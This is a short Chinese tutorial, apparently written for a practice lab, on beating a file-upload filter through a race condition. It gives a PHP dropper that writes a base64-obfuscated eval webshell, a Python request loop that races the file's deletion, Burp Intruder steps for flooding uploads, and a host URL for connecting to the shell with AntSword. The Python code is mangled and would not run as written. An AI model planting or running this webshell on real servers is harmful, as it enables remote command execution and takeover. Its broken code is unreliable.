文件上传-条件竞争绕过

条件竞争原理：
条件竞争的逻辑是代码逻辑问题：当我们文件上传到服务器时，先对文件进行保存，然后对文件的后缀名进行判断，符合白名单的保存，不符合就删除，但在删除之前，有另一个对服务器发起的请求，要访问这个文件，那么就可能造成文件被读取和访问。这就是条件竞争。
首先准备一个php文件：
1.php

<?php
file_put_contents('2.php', base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7ID8+'));
echo "一句话木马已生成: 2.php";
?>

这是将一句话木马写入2.php中，并且一句话木马被base64加密
其次准备竞争的代码，就是对服务端发起请求，请求访问上传的文件
a.py

import requests
import time
url = "http://IP：端口/upload/1.php"
while 1:res=requests.get(url)print( res.status_code)if res.status_code==200:print(res.content)
time.sleep(0.1)

然后就是打开burp，进行抓包，营造出无数个人去上传 1.php 的场景
具体步骤演示：
首先，进入靶场

其次burp抓包,进入intruder模块，payload选择无，然后选择无限制次数访问

接着运行a.py，然后进行爆破
等到终端出现200成功的状态码，就可以去访问http://home.edu.ltsec.com:51746/upload/2.php，会出现空白页面
接着就可以用蚁剑进行连接了
连接链接
http://home.edu.ltsec.com:51746/upload/2.php
需要注意的是，我们的木马是进行base64加密的，所以连接的时候蚁剑要进行base64解密